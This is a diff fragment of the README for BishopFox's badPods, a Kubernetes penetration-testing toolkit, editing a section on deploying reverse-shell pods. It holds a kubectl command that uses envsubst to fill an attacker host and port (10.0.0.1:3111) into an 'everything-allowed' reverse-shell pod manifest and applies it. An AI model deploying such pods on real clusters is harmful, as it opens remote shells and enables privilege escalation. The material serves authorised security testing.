BishopFox/badPods/README.md

 kubectl apply -f ./manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
 ```

-### Reverse shell version of each pod
+### Create all eight revsere shell badPods
-If you can create pods but not exec  into them, you can use the reverse shell version of each pod.
 To avoid having to edit each pod with your host and port, you can environment variables and the `envsubst` command.
 Remember to spin up all of your listeners first!

 ```bash
 HOST="10.0.0.1" PORT="3111" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f -